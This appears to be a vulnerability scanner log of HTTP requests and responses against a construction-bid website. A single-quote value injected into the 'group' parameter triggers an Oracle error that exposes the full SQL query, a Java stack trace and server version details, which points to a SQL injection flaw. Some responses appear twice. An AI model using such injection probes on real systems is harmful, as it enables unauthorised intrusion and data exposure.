class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
|
- /qap/action/IPPshowProjData
/qap/action/IPPshowProjData |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 324403 |
| group | GET | %27 |
| provider | GET | 453856 |
| sortType | GET | 0 |
| jobNo | GET | 1464405 |
Request
GET /qap/action/IPPshowProjData?jobCategoryNo=324403&group=%2527&provider=453856&sortType=0&jobNo=1464405 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:03:33 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:35 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 24438
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_f.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"><script type="text/javascript" src="/qap/j_scripts/quest.js"></script><script type="text/javascript"><!-- function doAddenda() { doAddendaLogin('addenda'); } function doDownload() { doLogin('download'); } function doAddendaLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=324403&provider=453856&jobNo=1464405&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_addenda_login.html?jobCategoryNo=324403&calling_function=%3Fcalling_function&provider=453856&jobNo=1464405', '', 'height=300,width=500,scrollbars,resizable'); } function doLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=324403&provider=453856&jobNo=1464405&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=324403&calling_function=%3Fcalling_function&provider=453856&jobNo=1464405', '', 'height=300,width=500,scrollbars,resizable'); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1464405', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1464405', '', 'height=650,width=1100,scrollbars,resizable'); } function doViewPlans() { //window.open('/qap/projects/prj_browse/prj_view_notifications.html?jobNo=1464405', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/prj_browse/prj_view_plans.html?jobNo=1464405', '', 'height=650,width=650,scrollbars,resizable'); } function confirmPlanDl() { window.open('/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1464405&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'); } function confirmPlanVW() { } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1464405&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); } function ShowSendProjectPreview(action) { window.open('/qap/forgotPassword.html?JobPK=1464405&emailOnly=true', '', 'height=300,width=600,scrollbars,resizable'); } function ShowViewResults() { window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&jobPK=1464405&group=%2527&provider=453856&viewOnly=TRUE', '', 'height=600,width=700,scrollbars,resizable'); } function ViewProjectQA(action) { window.open('/qap/projects/QA/qa_view.html?jobPK=1464405', '', 'height=650,width=1100,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=453856" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=453856" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%2527&provider=453856" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:03:35.957 [ 1] (TP-Processor1820) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No (+) AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No (+) AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = %27 GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td> <td width="100%" height="100%" valign="top"> <table class="menubar" cellpadding="0" cellspacing="0" width="100%" valign="top"> <tr> <td> <div class="btn_menu2" onclick="doPlanHolders();"> View Plan Holders </div> </td> <td> <div class="btn_menu2" onclick="doDownload();"> Download Project PDF </div> </td> <td> <div class="btn_menu2" onclick="doAddenda();"> Addenda </div> </td> </tr> </table> <table class="prj_detail" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td colspan="2" width="100%" height="10"><span class="prj_title">City of Chelsea, Iowa: Sanitary Sewer Improvements Project<span><span class="prj_num">(#1464405)</span></td> </tr> <tr> <td width="15" height="10"></td> <td colspan="2" height="10"> <div class="btn_container"> <span class="btn_generic" onclick="ShowProjectPreview();">Print Ad</span> </div> <!--input type="button" value="Email Ad" onclick="ShowSendProjectPreview()"/--> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">county/city/state:</span></td> <td width="210" height="10"><span class="prj_data">Tama - Chelsea, IA</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">directions to site:</span></td> <td width="210" height="10"><span class="prj_data">Not available</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids close:</span></td> <td width="210" height="10"><span class="prj_data">03/03/2011, 02:00:00 PM</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids received by:</span></td> <td width="210" height="10"><span class="prj_data">City of Chelsea, IA<BR>City Hall<BR>600 Station Street<BR>Chelsea, IA 52215</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle"><font color="red" size="2">addenda:</font></span></td> <td width="210" height="10"> <p class="prj_data"><font color="red" size="2"><strong>2</strong></font></p> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td valign="top" width="130" height="10"><span class="prj_ftitle">project description:</span></td> <td width="210" height="10"><span class="prj_data"><B>NOTICE OF PUBLIC HEARING ON PROPOSED DRAWINGS AND SPECIFICATIONS, PROPOSED FORM OF CONTRACT, AND ESTIMATE OF COST FOR THE CONSTRUCTION
OF THE SANITARY SEWER IMPROVEMENTS PROJECT, CHELSEA, IOWA, AND TAKING OF BIDS THEREFORE</B><BR><BR><B>Time and Place for Filing Sealed Proposals</B>. Sealed bids for the work comprising each improvement as stated
below must be filed before 2:00 p.m. on March 3, 2011, in the office of the Owner, the City of Chelsea, 600 Station
Street, P.O. Box 125, Chelsea, IA 52215.<BR><BR><B>Time and Place Sealed Proposals Will be Opened and Considered</B>. Sealed proposals will be opened and bids tabulated at 2:00 p.m., on March 3, 2011, in the City Hall, City of Chelsea, 600 Station Street, P.O. Box 125, Chelsea, IA 52215., for consideration by the City of Chelsea at its meeting on March 7, 2011. The City reserves the right to ..
Date: Tue, 01 Mar 2011 20:03:33 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:35 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 24438
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_f.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Topeka - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"><script type="text/javascript" src="/qap/j_scripts/quest.js"></script><script type="text/javascript"><!-- function doAddenda() { doAddendaLogin('addenda'); } function doDownload() { doLogin('download'); } function doAddendaLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=324403&provider=453856&jobNo=1464405&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_addenda_login.html?jobCategoryNo=324403&calling_function=%3Fcalling_function&provider=453856&jobNo=1464405', '', 'height=300,width=500,scrollbars,resizable'); } function doLogin(calling_function) { //document.location = '/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=324403&provider=453856&jobNo=1464405&caller=projects/prj_browse/ipp_prj_browse_f.html&caller_params=' + escape(document.location.search); window.open('/qap/projects/prj_browse/ipp_login.html?jobCategoryNo=324403&calling_function=%3Fcalling_function&provider=453856&jobNo=1464405', '', 'height=300,width=500,scrollbars,resizable'); } function doPlanHolders() { //window.open('/qap/projects/prj_add_mod/prj_plan_list.html?modifiable=FALSE&jobPK=1464405', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/planholder/planholder_list.html?modifiable=FALSE&jobPK=1464405', '', 'height=650,width=1100,scrollbars,resizable'); } function doViewPlans() { //window.open('/qap/projects/prj_browse/prj_view_notifications.html?jobNo=1464405', '', 'height=650,width=650,scrollbars,resizable'); window.open('/qap/projects/prj_browse/prj_view_plans.html?jobNo=1464405', '', 'height=650,width=650,scrollbars,resizable'); } function confirmPlanDl() { window.open('/qap/projects/prj_browse/prj_b_dlconf.html?member_no=&job_no=1464405&download_type=plan', '', 'height=300,width=500,scrollbars,resizable'); } function confirmPlanVW() { } function ShowProjectPreview(action) { window.open('/qap/action/showProjPreviewPage?JobPK=1464405&eca=showProjPreviewPage', '', 'height=600,width=700,scrollbars,resizable'); } function ShowSendProjectPreview(action) { window.open('/qap/forgotPassword.html?JobPK=1464405&emailOnly=true', '', 'height=300,width=600,scrollbars,resizable'); } function ShowViewResults() { window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&jobPK=1464405&group=%2527&provider=453856&viewOnly=TRUE', '', 'height=600,width=700,scrollbars,resizable'); } function ViewProjectQA(action) { window.open('/qap/projects/QA/qa_view.html?jobPK=1464405', '', 'height=650,width=1100,scrollbars,resizable'); }// --></script></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%2527&provider=453856" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=453856" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%2527&provider=453856" >Click Here To Sort By Letting Date</a> </td> </tr> </table> </td></tr><tr> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:03:35.957 [ 1] (TP-Processor1820) Problem including template component SQLLOOP query=" SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No (+) AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = <?p:group?> GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC" name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00911: invalid character while executing: SELECT jc.Job_Category_No, jc.Name, COUNT(j.Job_Category_No) N_Projects, UPPER(jc.Name) Job_Name FROM Job_Categories jc, Jobs_Job_Categories jjc, Jobs j, Job_Types jt, Job_Display_Types jdt, Provider_Group pg WHERE jc.Job_Category_No = jjc.Job_Category_No(+) AND j.Job_No = jjc.Job_No AND j.Job_Type_No = jt.Job_Type_No (+) AND (jt.Name <> 'hidden' OR jt.Name IS NULL) AND j.Job_Display_Type_No = jdt.Job_Display_Type_No (+) AND jdt.Display_Name LIKE '%QCPI%' AND j.Bid_Date >= TRUNC(SYSDATE) AND (j.Provider_Account_No = pg.Provider_No OR j.Q_Ipp_Owner = pg.Provider_No) AND pg.Provider_Group_No = %27 GROUP BY jc.Job_Category_No, jc.Name ORDER BY Job_Name ASC at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td> <td width="100%" height="100%" valign="top"> <table class="menubar" cellpadding="0" cellspacing="0" width="100%" valign="top"> <tr> <td> <div class="btn_menu2" onclick="doPlanHolders();"> View Plan Holders </div> </td> <td> <div class="btn_menu2" onclick="doDownload();"> Download Project PDF </div> </td> <td> <div class="btn_menu2" onclick="doAddenda();"> Addenda </div> </td> </tr> </table> <table class="prj_detail" width="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td colspan="2" width="100%" height="10"><span class="prj_title">City of Chelsea, Iowa: Sanitary Sewer Improvements Project<span><span class="prj_num">(#1464405)</span></td> </tr> <tr> <td width="15" height="10"></td> <td colspan="2" height="10"> <div class="btn_container"> <span class="btn_generic" onclick="ShowProjectPreview();">Print Ad</span> </div> <!--input type="button" value="Email Ad" onclick="ShowSendProjectPreview()"/--> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="100%" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">county/city/state:</span></td> <td width="210" height="10"><span class="prj_data">Tama - Chelsea, IA</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">directions to site:</span></td> <td width="210" height="10"><span class="prj_data">Not available</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids close:</span></td> <td width="210" height="10"><span class="prj_data">03/03/2011, 02:00:00 PM</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle">bids received by:</span></td> <td width="210" height="10"><span class="prj_data">City of Chelsea, IA<BR>City Hall<BR>600 Station Street<BR>Chelsea, IA 52215</span></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"><span class="prj_ftitle"><font color="red" size="2">addenda:</font></span></td> <td width="210" height="10"> <p class="prj_data"><font color="red" size="2"><strong>2</strong></font></p> </td> </tr> <tr height="10"> <td width="15" height="10"></td> <td width="130" height="10"></td> <td width="210" height="10"></td> </tr> <tr height="10"> <td width="15" height="10"></td> <td valign="top" width="130" height="10"><span class="prj_ftitle">project description:</span></td> <td width="210" height="10"><span class="prj_data"><B>NOTICE OF PUBLIC HEARING ON PROPOSED DRAWINGS AND SPECIFICATIONS, PROPOSED FORM OF CONTRACT, AND ESTIMATE OF COST FOR THE CONSTRUCTION
OF THE SANITARY SEWER IMPROVEMENTS PROJECT, CHELSEA, IOWA, AND TAKING OF BIDS THEREFORE</B><BR><BR><B>Time and Place for Filing Sealed Proposals</B>. Sealed bids for the work comprising each improvement as stated
below must be filed before 2:00 p.m. on March 3, 2011, in the office of the Owner, the City of Chelsea, 600 Station
Street, P.O. Box 125, Chelsea, IA 52215.<BR><BR><B>Time and Place Sealed Proposals Will be Opened and Considered</B>. Sealed proposals will be opened and bids tabulated at 2:00 p.m., on March 3, 2011, in the City Hall, City of Chelsea, 600 Station Street, P.O. Box 125, Chelsea, IA 52215., for consideration by the City of Chelsea at its meeting on March 7, 2011. The City reserves the right to ..
|
- /qap/projects/prj_browse/ipp_prj_view.html
/qap/projects/prj_browse/ipp_prj_view.html |
Parameters
| Parameter | Type | Value |
| current_sub_tab | GET | view_projects |
| group | GET | %27 |
| provider | GET | 765295 |
| sortType | GET | 1 |
Request
GET /qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%2527&provider=765295&sortType=1 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:03:45 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:45 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
